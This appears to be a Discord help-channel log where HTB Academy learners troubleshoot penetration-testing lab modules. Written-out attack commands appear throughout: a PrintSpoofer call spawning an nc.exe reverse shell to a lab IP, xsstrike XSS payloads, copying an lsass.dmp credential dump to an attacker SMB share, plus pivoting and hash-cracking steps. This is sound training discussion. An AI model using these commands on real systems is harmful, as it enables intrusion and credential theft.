#modules
I've had it failing a lot. I completed the kerberos attack skill assessment, and got curious how I'd list the share from linux and tried stuff but no luck.
you can also use kerberos auth with cme
I'm missing something badly perhaps. I can't cme with -k either, it throws me the usual KDC_ERR_S_PRINCIPAL_UNKNOWN on DC and on other machine I get the connection reset by peer.
If anyone's completed the kerberos module, let me know.
Have you completed the Kerberos attacks module? @thorn urchin
no
that error usually means either that user doesn't exist, you didn't specify the proper FQDN, or your kerberos ticket is bad
I know the user exists and the FQDN isn't a thing with cme. Probably the latter, I'll explore more.
or the service belongs to other forest
it's always a thing, kerberos anal as fuck about domain names
No forest involved here.
the error means the requested SPN is not in the Global Catalog
I was looking into one of Ippsec's videos about this, he faced the exact same issue, but he fixed it just playing around with re-chaining the KRB5CCNAME variable. 🤔
ye cause his kerberos ticket was bad
Which can happen
sometimes you just need to regen the ticket
Hmm, I'll play around more. Thanks everyone~
For example, an event log 3 about a Kerberos error that has the error code 0x7 KDC_ERR_S_PRINCIPAL_UNKNOWN for Server Name cifs/<IP address> will be logged when a share access is made against a server IP address and no server name. If this error is logged, the Windows client automatically tries to fail back to NTLM authentication for the user account. If this operation works, you receive no error.
https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/enable-kerberos-event-logging
found this
Shells and Payloads module, Reverse Shell section: This script isn't working
You probably need to modify it to be your ip in the 10.10.14.158 part
Can also use psexec
you don't have anything listening on 443
oh shit, yeah, I forgot to start the netcat listener , thanks 😄
what
So, on my win10 VM I can't install kali linux for WSL because it is saying "please enable the virtual machine platform windows feature and ensure virtualization in the BIOS"
How am I supposed to do this on a VM? When using key I only get boot manager for the VM not any bios settings
why are you trying to install a kali vm inside of a windows vm
It's part of this info sec foundational stuff
It's not the actual VM
it's kali linux for WSL
same thing, it's still a vm effectively
yeah idk, I haven't done that module
so no idea why'd they would want you to install a vm inside a vm
that's silly
<@&861185840277487616> bot
From what I can tell, it's basically so that you can use linux stuff in the windows environment, like they want me to be able to use Bash and chocolatey etc
yeah but you can just install a linux vm
Which I have done, in the previous section
During Linux fundamentals, I followed it and installed a Parrot OS VM
Now during windows fundamentals I installed a win 10 VM and it started asking me to do these things
and it asked you to install a windows VM?
"With all this in mind, where do we start? Fortunately for us, there are many new features with Windows that were not available just a few years ago. Windows Subsystem for Linux (WSL) is an excellent example of this. It allows for Linux operating systems to run alongside our Windows install. This can help us by giving us a space to run tools developed for Linux right inside our Windows host without the need for a hypervisor program or installation of a third-party application such as VirtualBox or Docker.
This section will examine and install the core components we will need to get our systems in fighting shape, such as WSL, Visual Studio Code, Python, Git, and the Chocolatey Package Manager. Since we are utilizing this platform to perform penetration test functions, it will also require us to make changes to our host's security settings. Keep in mind, most exploitation tools and code are just that, USED for EXPLOITATION and can be harmful to your host if not careful. Be mindful of what we install and run. If we do not isolate these tools off, Windows Defender will almost certainly delete any detected files and applications it deems harmful, breaking our setup. OK, let us dive in."
That sounds like instructions for a windows host, not necessarily to stack inside a windows vm
I thought this too after re-reading but then it literally goes from that to installing the windows VM
Personally I'd ignore it. Either follow the instructions inside a windows host, or skip.
Cause installing a vm inside a vm is dumb
imo at least
I don't get it myself really but I am new to all this, only been in IT since january and as an apprentice on help desk
So was just following the guide really
yeah happens. Like I said I didn't do that module so idk if you're misreading it or if it really is just suggesting you do something silly
It is one or the other, either way thanks for your 10 cents
I am convinced you are right about this being something that should be done on a host
The crackmapexec in the target machine doesn't respect the KRB5CCNAME ccache file. That's the issue.
i followed every step
i configured the proxy
server
and i got this
module
RDP and SOCKS Tunneling with SocksOverRDP
im losing my mind
fix?
the real time protection is deactivated
and im going crazy with this
that shit never works. Cheat and use it as a chance to practice a diff pivoting method
can i see your netsh command
TCP 127.0.0.1:1080 0.0.0.0:0 LISTENING
<@&861185840277487616> the bot, again.
i've just started getting into ligolo and i'd recommend it
yeah go for it
wish it was covered in the pivoting module
ligolo is still relatively new
I could see it getting an addition though with how popular its getting
im losing my mind now
with that question
ill try ligolo
i hope it works
fuck my life with this same message haha
u guys prefer chisel or ligolo
lul
chisel was my favorite pivoting tool, Ive nearly entirely replaced it with ligolo
which one u guys recommend for me to learn and practice and master
yeah hence why I think it's a bot. Doesn't respond or react to anything, just copy pastes the same message periodically to dodge auto spam filters
@novel matrix ^
diff guy but amusing timing
Who can help me with XSS module?
How do I use the payload i've got from xsstrike?
I ran xsstrike.py and found '><a%0doNpOINteREnter+=+a=prompt,a()>v3dm0s as the payload
sudo ip tuntap add user nee mode tun ligolo
sudo ip link set ligolo up how can we use this command in windows
check the github page it tells you
anyone who did the Linux privilege escalation module section "Logrotate": were you able to successfully get this exploit to run? Give me some help
which part?
Phishing section
i've not used that script to complete the module
you can even complete it from your mom's PC
i mean you do not need any tool to complete the Phishing flag
How did u find out the payload to inject js in the url
inspecting the code
Sorry, it's not clear
what type of exploit should I do then?
think out of the box !
you have to "fuzz" it a little, try some input and check output
how can you escape and inject code?
Need a source module brute force admin root on an Android g stylus
Login Form Injection
"Once we identify a working XSS payload, we can proceed to the phishing attack"
I just wanted to understand how to use the xsstrike
How do I apply this payload that I found?
you do not need any tool to find the “payload”
You are not understanding my question. Thx anyway for helping me out
Blessed
also the tool returned the correct payload which is '>
after that you include your code with script tags
since its javascript code
Yep I got that
I'm just trying to understand the line of the xsstrike output:
"Payload: '><HTmL/+/oNPOIntereNTER%09=%09[8].find(confirm)//"
The thing is I was trying to read that and get the whole line rather than the '>
if you check the source code of the site (ctrl+u) you will see how your input is reflected and infer how to inject code which leads to '>
that is just a random payload used by the tool
to confirm the code injection and the consequent XSS
Ok understood.. ty
I'll inspect the code always thanks Rafa
Have you considered that meta data in security has already either patched or included method type ? Maybe same method different wording
?
Hello guys for anyone who's doing the module pivoting & forwarding section SocksOverRDP
and facing this problem
i think your tunnel is not properly setup
when u configure the proxy
don't run mstsc.exe from the cmd
cuz u will face this problem
because reason 1 and 2 are not possible here
that was weird but idk
everything was set properly
i just tried to run rdp from the search bar
actually weird yea
can you check what binary does rdp from search bar run?
with right click > show in folder maybe
maybe from the cmd it runs with elevated privileges
i cant think about anything else
just user error xD
when i reach that module i will try in my side
idk
its so weird
like for real
wasted 6h
to fix this
XDDDDDD
so fking dumb
yo I am doing the same question, did you manage to do it. any hints
Hi , i'm doing the WINDOWS EVENT LOGS & FINDING EVIL module (https://academy.hackthebox.com/module/216/section/2303) , and i cant seem to understand the question : By examining the logs located in the "C:\Logs\PowershellExec" directory, determine the process that injected into the process that executed unmanaged PowerShell code. Enter the process name as your answer. Answer format: _.exe . Can anybody give me a hint ?
anywhere i can practice the ligolo
on windows hosts
i want to change my nickname here
can an admin help me to achieve this
best place is the prolabs but on the academy you can also do it on a few big modules like the pivoting or the AD module; both modules have a lot of chained boxes and you can use those to practice pivoting
Read the section carefully
what is ur best pivoting tool
ligolo-ng
hmm been solving it for days now, almost gave up. any strong hints, event IDs or filters
\
yeah i want to start practicing it
ig I'll practice it
on pivoting skill assessment
tomorrow
Again if you read the section you'll generally get the answers
You've obviously missed something
You're given that the answer is a *.exe process
Yeah I already searched every log for that, I guess I have to try it again and again
Read the section, they probably give you a syntax to speed things up
I don't have this module unlocked but that's my best guess
But you can also try Google if you've really been at it for days
CLASSIC
I did, no clue but will just keep going, never give up never what?
The RDP session only gives a black screen, how to solve this? Rebooted the VMs already, restarted the services but nothing else than this.
Module: INTRODUCTION TO ACTIVE DIRECTORY --> AD Administration: Guided Lab Part I
Press space
So simple, thanks!
who can help me with this module https://academy.hackthebox.com/module/67/section/603. No matter how many times I follow the tutorial, it still fails and I don't know where I went wrong. I'm hoping someone can give me some tips, I'd be very grateful
Good morning.
I'm working the LINUX FUNDAMENTALS
Page 12
I'm stuck on the last questions.
I can't get the number of links correct
you can dm me
great
hey, i am working on the machine called nibbles in modules hack the box introduction, but the machine keeps crashing and bugging "Timeout is exceeded The server at 10.129.213.xxx takes too long to respond." , i have changed the vpn server, reset the box many times but it keeps crashing. any clues ?
can you ping it from your machine?
Are you running both the in-browser pwnbox and a vpn connection from your own vm at the same time?
yes i am running my vpn on my vps pwn box and also my vpn in my pc browser locally
Don't
Running the pwnbox and vpn connection simultaneously causes network collision issues as they are both assigned the same internal ip
okay thanks, i will not do that anymore
You don't need to use the browser vm unless you're trying to troubleshoot why a command that looks correct isn't returning an expected result
now its working well better when i use just one machine and not 2 at the same time thanks
Some serious guiding going on here
?
Just wanted to say thanks. Didn't know that before
Oh lol
Like it makes sense when you realize the pwnbox is natively connected to the vpn network.
In the Linux privilege escalation Module.
Section logrotate.
I get an error.
I tried a lot of things and used different versions of the exploit but still the same
is gcc installed on the target machine? You can directly compile it from there and avoid any dependencies issue
I compiled it on my own. I'll try it now
Hi guys, would someone please help me, i am stuck with this question : Try running a VHost fuzzing scan on 'academy.htb', and see what other VHosts you get. What other VHosts did you get? I've tried this command : ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:32910 -H 'Host: FUZZ.academy.htb' -fs 900 -v
is it right ?
Just ask your question
Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.
I've done this, captured using:
curl -o website_source.html https://www.inlanefreight.com
and filtered using:
grep -o 'https://www\.inlanefreight\.com/[^"]*' website_source.html | sort -u
i get a bunch of inaccurate total number of links when i count with wc
I need help constructing the filter i think
You put your grep output flag before your actual grep
Also sometimes grep doesn't do regex
Iirc egrep does but you can just do man grep to see the regex flag
@fathom pendant yes its in /etc/hosts and its the port that they give
the scan returns a lot of subdomains and i dont know what to do
Well they're probably looking for a list... if you check usually it tells you the expected format
the expected format is '*.academy.htb', I've tried with ' and it doesn't work
@fathom pendant
...take the quotes out
Also are you sure your -fs is correct
Your filter looks for a response size of 900, which could be the 404 page
Or some other error page
Or more accurately filters against size of 900
So anything that isn't a 900 size is returned
If you're looking for a response of size 900, then you want -ms
can't seem to do the filters properly
I think there's an example command in the cheat sheet
nothing there
read the section again then ¯\_(ツ)_/¯
Also are you sure you're getting what you're expecting with your curl command
Add -e to your grep command
Thanks, that lets me specify multiple parameters for options
yes it was the filter, i found it finally, thanks for ur help
That's another place where doubt lies. I wonder if there's something missing there
Or I'm just not counting correctly
I think that i just mostly need to fix the regex for clearer filtering
¯\_(ツ)_/¯
I appreciate how hard these challenges are, however I want to advance
does anyone know how to complete the log poisoning lfi
Iirc single quotes and if you fuck it up, you gotta reset the box
How do I link all my accounts with discord
feel like i nearly got to that answer before but the php leaving the log file output threw me off
what do you mean
There's a settings in discord to do it, but that's not related to this channel
Also your question isn't related to the htb platform
please keep on topic.
need some help on the attacking common services sql section please!!!!
tell us
question 2 enum flagDB
i have a password for mssqlsvc but can't get anywhere with it really for enumerating
lol
can't get anywhere as in login?
i'm assuming you are logged in
i logged in with mssqlclient.py but can't elevate privileges
tried to impersonate too
with mssqlclient.py for example
? 🤣
login with the service account and enumerate the database
dont forget to use -windows-auth flag
hint: if you were able to login then this isn't your goal
i just logged in, that's so weird, i tried 5x
you have to login as the service account MRtom
and then enumerate the database
it's a simple exercise
that is the service account 🤣 the given account is HTB-student or something not this
the htbstudent is to trigger the ntlmv2 hash
please try to recall the module before talking
spoiler but yes he is on the second account which is only a step away from the flag (which is getting it 🤣 )
i got the hash
i always have my note open when helping
that is what i was telling him all the time
hi any hint for Footprinting medium machine, I'm lost
same lul
see this message
he was 1 step from the flag 🤣
miss misread i guess
mssqlclient
so where are you stuck?
yup
connect with mssqlclient
at the start hahahah i just scanned it but i don't have any credentials for smb or rdp, rpc
i looked at the forum, they mount a db but i don't know how
first do some basic enum, try everything the module showed based on what servers there are on that box
Hello 👋
that isn't a good way to start 🤣 at least do some basic stuff before going looking for the answer somewhere else
everything you need is shown in the module
i took a lot of time off 😦
i think i will read some parts again
welp you got the hint on where to start, just go back to that section
yo @novel matrix you still here? got a clown here that needs to be scooped up
You're in the wrong server for this crap
Need help regarding Broken Authentication Module -> Broken Cookies -> Question 1
let me guess need help with the role right?
yes
I was going to write that
What is the wisdom here , Mr. Squirrel
Hmm
hint read the question again the right role is in it 🤣
super user ?
somehow 2 SERIOUS RULE BREAKS and no one scooped that clown up
hint role has 1 word
and one of them is right so you may want to remove it 🤣
same when i was first doing this part
Thanks Mr.Chonky Squirrel
need some more help with sql section just need a hint or something
been stuck for 6 hours
oh still on that one? after logging in did you check ||flagDB|| ?
how? i don't have permission
with mssql service account you can read the flag
im reading it right now
it doesn't show it in the list on my end
just to test
try master.dbo.sysdatabases; also all of the commands that you need for this last part are under SQL Syntax in that section
btw you are querying for tables
i suggest you to take a look into sql module
here it is shown how information_schema works,
hello guys
need some help
i tried to use ligolo to pivot to an internal network and i'm facing this problem
ebadmin@inlanefreight:~$ ./agent -connect 10.10.14.8:11601 -ignor-cert
./agent: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.34' not found (required by ./agent) ./agent: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.32' not found (required by ./agent)
it's funny because they tell us to go in order with the modules
and that module is 10 modules after the one im on...
guys is there a way to install responder from ubuntu linux?? (ping me :))
im still unable to get where i need to unfortunately
where?
someone?
i typed use flagDB and entered into the database but can't query anything, it's weird
same problem as usual, compile it statically
show tables;
why?
XD how, like compile it inside the target? idk what you mean
youre right my bad lol
git clone https://github.com/SpiderLabs/Responder
root@Linuxi:/home/isymbol# git clone https://github.com/SpiderLabs/Responder
fatal: destination path 'Responder' already exists and is not an empty directory.
alr did that 😭
where do git cloned repos go in?
you compile it locally and then transfer it to the victim machine
personally i have an uploads folder and spin up a WEBSERVER in the chosen program to transfer it
@sly dome all i can do i guess is reset the machine
ive found some of these machines to be very buggy and need constant resets
where do git clones repos go in?
doing it now ill
hello y'all, I'm receiving this error when trying to pivot to the 2nd Windows Machine (172.16.6.155) in the SocksOverRDP lab exercise..!!! any idea what could be happening?
it's not show tables, my bad there xD
wait
SELECT Distinct TABLE_NAME FROM information_schema.TABLES
for example
from the module
SELECT table_name FROM flagDB.INFORMATION_SCHEMA.TABLES
like this
┌──(shadowalker㉿kali)-[~/pivoting/ligolo-ng]
└─$ CGO_ENABLED=0 go build -o agentcompile -ldflags '-extldflags "-static"' ./cmd/agent/main.go
yes
the final step yes
I hope I'm not posting in the wrong area but please let me know.
Question on the Footprinting Pathway in the section of SMB.
I'm trying to answer this question:
Connect to the discovered share and find the flag.txt file. Submit the contents as the answer.
I tried looking over this several times and can't see where it instructs me to connect to the share. when I type command "smbclient //sambashare/sambauser -I 10.129.244.188" I get prompted for a password which I do not know. Can I please get some help???
smbclient <options> \\\\<ip-address>\\<sharename>
So thankful... I hate myself. I have taken notes on this in One note and skipped over the section where it says how to access a share Facepalm
anyone, is it possible to find an ftp exploit on a windows 11 machine
because i try 2 times
and nothing
no results
ftp <ip>
and if it has anon login allowed then
ftp anonymous@<ip> (i think)
@sly dome
└─$ sudo ip route add 172.16.0.0/16 dev ligolo
[sudo] password for shadowalker:
┌──(shadowalker㉿kali)-[~]
└─$ ip route
default via 10.0.2.2 dev eth0 proto dhcp src 10.0.2.15 metric 100
10.0.2.0/24 dev eth0 proto kernel scope link src 10.0.2.15 metric 100
10.10.10.0/23 via 10.10.14.1 dev tun0
10.10.14.0/23 dev tun0 proto kernel scope link src 10.10.14.8
10.129.0.0/16 via 10.10.14.1 dev tun0
172.16.0.0/16 dev ligolo scope link
172.17.0.0/16 dev docker0 proto kernel scope link src 172.17.0.1 linkdown
i set up everything
still cannot ping the target
double check everything
you have to see in the ligolo-ng proxy the connection
also tell ligolo-ng to use that tunnel
which module are you on and are you sure the subnet is 172.16.0.0 ?
yea the subnet is 172.16.5.0/24 lol
tf
how can there be a 0.0/ network
if the netmask is 255.255.0.0 the CIDR is /16
wait what, 255.255 is the network and the other parts are the host no ?
start
also stop copy pasting your whole outputs
and start sending screenshots
of the whole process
we are unable to debug your own problem
i got a sa user and i can't use his credential for rdp, smb or rpc, i don't know what i'm missing. Footprinting Lab - Medium
a hint for the last part is instead of password spraying try ||username spraying || also for the logging in part you should be able to with the username start with ||a||
i got the username with a but i got it from smb
i just saw that i may use remmina?
any rdp tools will work fine
admin'# 🥵
i have some problems with xfreerdp
This module SA was a suffering lol.
couldn't have done it without these patient people @acoustic owl @carmine hill ❤️
Anyone in future need help with this module dm me ❤️
remmina worked :V
tier 3?
Yes
Would you also happen to know how to change directories while connected? When I try I get nowhere
I would suggest to look at the "linux fundamentals" module, anyway there is only one directory I can see
smb protocol is share based
and you don’t have access to the entire file system
If you're at the head of the share you're not gonna be able to go backwards
yea
@drifting vortex if you where asking for this here you have your answer
Thanks @fiery berry and @fathom pendant. I was trying to go to the head not realising I was already there. I know the "D" stands for directory so I thought might as well start at the beginning... I'm having a rough day :/
But my flag was in Contents so thank you guys!
That's why @fiery berry suggested linux Fundamentals
And tbh: the question probably told you it was there, if not it hinted it
90% of the time the question tells you where to look
The question was: Connect to the discovered share and find the flag.txt file. Submit the contents as the answer
So you're right @fathom pendant. I know where I messed up but I'm too embarrassed to talk about that. I'll take the L
Can I have a talk with sb?
Using Crackmapexec - Password Spraying - Which other account has the STATUS_PASSWORD_MUST_CHANGE flag?
is it bugged this question?
I only find peter
I'm stuck on this question: **When you try to access the IP shown above, you will not have authorization to access it. Brute force the authentication and retrieve the flag. **
I'm stuck on finding the right username and passwordlist. I tried create various usernames list and passwordlists with cupp and username_anarchy, but so far I do not get a hit.
Is someone available to point me in the right direction?
found the right list
should put the module too
You're right, it is the login brute forcing module. But, I already solved this question. It was so easy that it made it hard 🙂
I am stuck on this question in the "Introduction to Threat Hunting & Hunting With Elastic" module for a few days. Hunt 2: Create a KQL query to hunt for "Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder". Enter the content of the registry.value field in the document that is related to the first registry-based persistence action as your answer.
I have tried to use event code 13 as suggested in the Hint but failing to understand what exactly I am looking for. I am even using the registry.path and registry.value fields but have above 9000 hits to filter.
hey guys I am struggling with a medium lab from the footprinting module
these are my findings so far
Open ports: 111, 135, 139, 445 (RPC), 2049 (NFS), 3389 (RDP), 5985 (WinRM), 47001 (WinRS)

Valid credentials obtained:
- alex/lo.......... (from NFS share file)
- sa/8......... (from SMB share file - potential SQL credentials)

Users identified:
- alex
- HTB (target user)

Services available:
- RPC
- SMB
- NFS share /TechSupport
- RDP
- WinRM

Information from RPC enumeration:
- OS is Windows 10
- Domain is WINMEDIUM
- SMB share devshare

Information from SMB share devshare:
- File important.txt contained SQL credentials

Information from NFS share:
- Confirmed alex credentials
- Indicates web server running at web.dev.inlanefreight.htb
- References SMTP server smtp.web.dev.inlanefreight.htb
edited the pass and user
Does the "Security Monitoring & SIEM Fundamentals" module make you work on Kibana?
it would help if you stated where you have problems
So where are you stuck? You have the credentials you need
You use kql yeah, within elastic
Event code 13 yes, but what else are you looking for?
What exactly in the registry path?
The link gives you the example keys which are default on windows
Make a query so that you have event code 13 and the paths it shows covered
can someone explain this question
i used ligolo-ng to connect to the internal network
how can i download a file from the internal network to my machine
I mean pick your poison?
event.code:13 AND registry.path:"HCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Use whatever file transfer you want.
if your preferred method requires hosting a service to do so, then add a listener to forward the port to your machine (assuming the end machine doesn't just have allowed outbound)
Try using wildcards before software and after run
Got it? @turbid heron
Trying...
hello, is there any Spanish community ??
This is an English server
ah ok sorry XD
I am trying to send a picture just a second
add a listener on the proxy or the client
like i'm a bit confused
You need to verify your acc to send pics
ligolo has a listener_add function
That depends per person I guess
Ive heard people struggling with malware analysis though
yes i know
Haven’t gotten that far myself, but I’d say the first 4 modules are definitely doable
but i want to make an smb client on my attack box
If you still haven't found it, check if you have all smb users with --users
and move the file from the internal network
you can just use smbclient then
nothing extra needed
you'd only add a listener if the end box doesn't have outbound to your machine AND you need to host a service (i.e. a web server, a smb share, etc) or if you need to double pivot
yeah but when I'm using like move from the windows host
And recommend it to those that are more interested in blue side, or want to learn more about it
this is without the registry.path parameter
trying different ways for registry.path
event.code:13 AND registry.path:*SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run*
if that's how you want to do it then yeah, in which case you'd add a listener if the end box doesn't have outbound to you
no I'm at work
oh oki
you don't need to worry about proxy or client. just use the ligolo provided functionality
it spawns the listener for you
honestly it's something a lot clearer if you just follow the instructions on the github and try it out and see what happens
Thank you 0x56 the query you suggested was the perfect one it narrowed it down to 12 hits....I realized my use of ( " " ) outside the path was wrong
Thanks again
You’re welcome👍🏼
Sometimes 172.16.5.35 can reach 10.10.14.8 anyways and a listener isn't necessary. If it can't though, then yes a listener is precisely for this situation
how can that happen? it's a different network
im asking
Why can your computer behind your nat reach out to google, it's a different network 🤔
router
(basically outbound tends to be less restricted than inbound)
you wouldnt need a web server specifically, but yeah. which is a very safe assumption in the real world
remember the 10.0 network is just a lab convenience
in the real world that 10.0 machine is likely to be a public machine running your c2
ah i think i understand you
yes. and often they're just meant to be analogies for a real world situation
you mean that in real scenarios both networks maybe are connected
that we should first try without listeners
and even in a lab because a lab is simulating a real world scenario
You don't necessarily have to try it first, I often just make the listener as well, but it can be convenient sometimes when it doesn't work well
there's also side considerations about how in a real network it may look weird if you just keep routing everything through the same workstation on the network
true
smbserver.py -smb2support -port 9001 MyShare /path/to/directory on my attack box
on the internal network move lsass.dmp \172.16.5.15:9001\skill
and on the pivot i did this listener_add --addr 0.0.0.0:9001 --to 127.0.0.1:9001 --tcp
but it didnt work
what am i doing wrong
in the move command you need to use "\\"
to tell its a network share
but otherwise i see it all good
some more modern Windows versions also deny anonymous share access, you have to specify a user and password for smbserver
also you have to specify MyShare
also with ligolo I don't like specifying 127.0.0.1 as it can be kinda wonky sometimes. If I'm lazy I'll just use 0.0.0.0 for both
I keep getting the page is timing out.
PS C:\Windows\system32> move C:\lsass.dmp \172.16.5.15:9001\skill
move : The network path was not found
At line:1 char:1
+ move C:\lsass.dmp \172.16.5.15:9001\skill
+
    + CategoryInfo          : WriteError: (C:\lsass.dmp:String) [Move-Item], IOException
    + FullyQualifiedErrorId : MoveItemIOError,Microsoft.PowerShell.Commands.MoveItemCommand
?
actually the error is about the path
can you mount the net share?
like map it
like use x: NET_SHARE_HERE
if you cannot you need credentials
like madf0x said
also while it shouldn't be an issue, if I'm gonna host a smbserver I prefer to keep it on 445 because that makes windows more happy
i think they have had so many vulns and flaws around SMB they just do not let you disable the firewall 🤣
only port 445 allowed guys
double bonus is that it's slightly more stealthy too because why tf is SMB operating on ANY port other than 139/445?
wtf now I cannot add
a listener
on the agent
my god
my head hurts at this point
yo guys
I'll ask a question, it may feel stupid
but I'm not thinking properly at this point
XD
can i add a listener on the agent not the proxy
you do not interact with the agent on the agent
or do I need to add the listener on the proxy and it will create a listener automatically
.
think of the proxy/server as your command interface/C2 for your pivots
I need to go sleep XDD I'm losing my brain cells
the msfconsole to your meterpreter
Why is nc -nv taking long to respond in ids/ips hard lab
Anybody up?
I am!
on researching i found about root squashing
i got stuck in Footprinting skills assessment lab 2
i got the nfs share but no luck as there is the permission of nobody user
I even mounted the share as root
but couldn't open the share
Can you provide me any hint or ways that the "nologin" can be bypassed or something related to it?
I have not made it to the assessment lab 2 yet. Apologies.
No worries
sudo su
then you unfortunately went about it wrong
you gotta mount and browse as root
you mean i don't need to mount it as root?
no I said and
Ohh yeah yeahhh, thankssss, I got it
As was told to you multiple times
Having the same issue.
Fixed by using this command sudo bundle install instead of bundle install
anyone know about this error?
smbclient > get 7-ZipPortable_21.07.paf.exe
parallel_read returned NT_STATUS_IO_TIMEOUT
will be grateful for any help
Use timeout in smbclient
thank you
Np
I have a general question about HTB
read #welcome and #rules, after that use /verify at #bot-commands and ask that at #general or #1024429874246590575
what is the purpose of "/format:hashcat" in Rubeus? I am asking this because I cracked the hash using hashcat with and without using that tag and got the clear text pass.
are there red teams 👀
I need some help with the nmap module if that's alright
Is there a channel for the new cdsa path ?
hello any help : module ATTACKING ENTERPRISE NETWORKS - Exploitation & Privilege Escalation : using c:\DotNetNuke\Portals\0\PrintSpoofer64.exe -c "c:\DotNetNuke\Portals\0\nc.exe 10.10.15.128 8443 -e cmd" tried multiple PrintSpoofer versions still got error:
172.16.8.20[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
CreateProcessAsUser() failed. Error: 216.
read #welcome and verify, this is only for HTB Academy modules
who can help me with WINDOWS PRIVILEGE ESCALATION - Credential Hunting? In the first question I find so many passwords but not one is right
While the "first question" can be solved entirely by using the GUI, you can try one of the commands shown in the module section
yeah I use "findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml"
if the output is overwhelming try one extension a time
but it has so many files and I found some that look like the right password but they are all wrong
what?
read the above
can you give me the command?
it is literally the same command you used, just search for one extension a time
ok let me try
also not have
did you put some effort looking at the output of the command? The file you're looking for is in a path which will stand out from the others and it has a ||.xml|| extension
you can see the picture I gave you, it has so many files
ok I found it
thanks
I had the same result as everyone does (more or less probably). I was patient and started to skim only through interesting paths
yeah, at the beginning I couldn't see it
oh sry ok
I didn't see the channel name and all
my bad
Module name : Password attacks
Section name : Passwd, Shadow & Opasswd
can someone help me with hashcat? ||I found the backup folder and exported passwd.bak and shadow.bak and then I mutated the wordlist but hashcat can't find the password for the root user. I did hashcat -m 1800 -a 0 unshadowed.hashes mut_password.list -o unshadowed.cracked|| I don't know what to do
try rockyou instead
you need an account on the main platform, unless you have silver annual
I do have an account but I don't know what you are talking about
Is there a way to check what modules are included in the new SOC path?
please read #welcome
ahh should have opened my eyes XD
I've done CompTIA CySA+, now I wanted to do the free modules and start the pentest path after. Would you recommend doing SOC first and Pentest after, or would that be a money sink?
I have to use hashcat but it stops every time
I checked my notes, the mutated password list should work, try running hashcat on your host instead and maybe try with John
i'll try thanks
Hello friend. Could you give me some hints?
Hello gentlemen and ladies! could someone provide me some hints for Brute Forcing Usernames /question2 ?
Tried burp, ffuf, hydra and plenty userlists with no luck. Also applied various regex.
Thanks in advance!
Friends, how can I bypass the 403 forbidden page? I know that the server has understood my request, but unfortunately I do not have permission to access that page.
I need help for this question "Using the techniques shown in this section, find the cleartext password for the bob_adm user on the target system."
Hi guys. For the Footprinting Module -DNS I'm on the question: _What is the FQDN of the host where the last octet ends with "x.x.x.203"? _
I already have the answer but I'm sure I went about it the wrong way and I'm looking for a more efficient way to go about it. Basically, how did you find which wordlist to use with dnsenum? I used the right one by sheer dumb luck, but if not I would have had to trial and error across every subdomain. Is there something specific you look for or know?
Module: NETWORK ENUMERATION WITH NMAP - Saving the Results
HI Guys
While running the XML to HTML conversion on my VM box that is connected to the VPN I am getting the following error. I googled it but it was giving 100s of solutions that were not in connection to this.
Any Ideas
xsltproc target.xml -o target.html
warning: failed to load external entity “target.xml”
cannot parse target.xml
Many Thanks
Kapz
I think mine was trial & error also. Don't remember if resources had a list, but I sometimes forget resources is there lol. I found one in SecLists DNS file path
for this who can help me
Go to the Microsoft Community and you will find help there
what module is this?
based on the question you can probably just copy and paste the commands from the section and obtain your results.
this question:Using the techniques shown in this section, find the cleartext password for the bob_adm user on the target system.
yeah but it didn't find bob_adm's password
i know the question, i’m asking what module it’s from
WINDOWS PRIVILEGE ESCALATION-Other file
i seem to have forgotten the same thing. it's bugged out for me now. neither cheat sheet or resources are loading but ill check it again later ;_;
who can help me
sorry forgot to reach back out, i’ll be back in a few hours if no one is able to help you, but usually you can just do exactly what the section did and get the same results
can I dm you?
sure, i’m not at my computer though so i don’t have my notes to assist😅
I call you
are you ok?
i don’t do calls😛
ok
can I dm you?
like i said i’ll be back in a few hours if no one can help you by the time i return
but if the question says “use the techniques shown” you can probably just use the commands in the section and retrieve the flag
yeah but I am from China, the time zone is a problem
when running nmap did you use the -oX tag to output as XML before converting it to HTML?
hey I'm new at cyber security, I want to ask if anyone is using Ubuntu Linux?
the tutorials are using parrot, but i just started yesterday 😂
this channel is for HTB Academy modules, read #welcome and #rules, after that use /verify at #bot-commands and ask that at #general or #1024429874246590575
but in short you can use whatever the hell you want
I am able to ping an IP provided in the interactive exercises but I am not able to open the web page it is holding at Port 80.
I am connected to an academy VPN. I have already re-generated it once by switching to a different eu based server, for more context.
who can help me
And when I am trying to reset the target, it is not resetting it per se.
Rule 1:
Do not ask for help when asking for help. Please, simply describe the problem which you are facing.
Someone will come along and help you.
this
@brittle gorge
Can you describe which module or box are you talking about?
And what part of the problem are you facing difficulty in solving.
WINDOWS PRIVILEGE ESCALATION-Other Files
so can you help me
or can I dm you
If you can tell me have you tried everything taught to you in that section since the question really takes its basis on what techniques they've taught in the entire section above the question?
Since it is mostly trying out different ways to sweep or search through the system to find different useful files. All those commands that are in the module.
yeah I use "findstr /si password *.xml *.ini *.txt *.config", this command, but it has so many results I can't find the right password
Okay, so can you peek your way through techniques related to powershell which is taught in the module and perhaps try those commands from the examples?
And if you get overwhelming amount of results from the commands then try using google to find out how you can filter those results or be patient and look through them. Try to utilise all the information which is at your disposal related to the user.
can I dm you
Sure
looks like a GUI issue, did you refresh or even try a hard refresh?
yup. Did hard refresh and even changed browser with clean cache
There are no available instances. Please try again later.
not even getting instances lol
oh if that's the issue there is nothing you can do lol
same
but if after this you keep getting that same issue with your target contact support
also your target wasn't docker right?
nope
okay, makes sense
where are you getting the problem? because i can spawn targets
and interact with them from my Parrot
Web Attacks -> XML External Entity (XXE) Injection -> Local File Disclosure
let me try
I am able to ping those targets but I am not able to interact with webpage served at port 80 of the target ip as intended.
works for me
When I try to curl, it shows
curl: (56) Recv failure: Connection reset by peer
And in browser, it shows Unable to Connect
wait hang on, I'm doing this exact module rn and my machine isn't working
ok i lied its fine again
skill issue 😛
Interesting
ok yeah no i think mine is back but i was def getting 'no route to host' or whatever in burpsuite
so maybe its just being a bit of a menace rn??
Okay, so I am now able to spawn a pwnbox
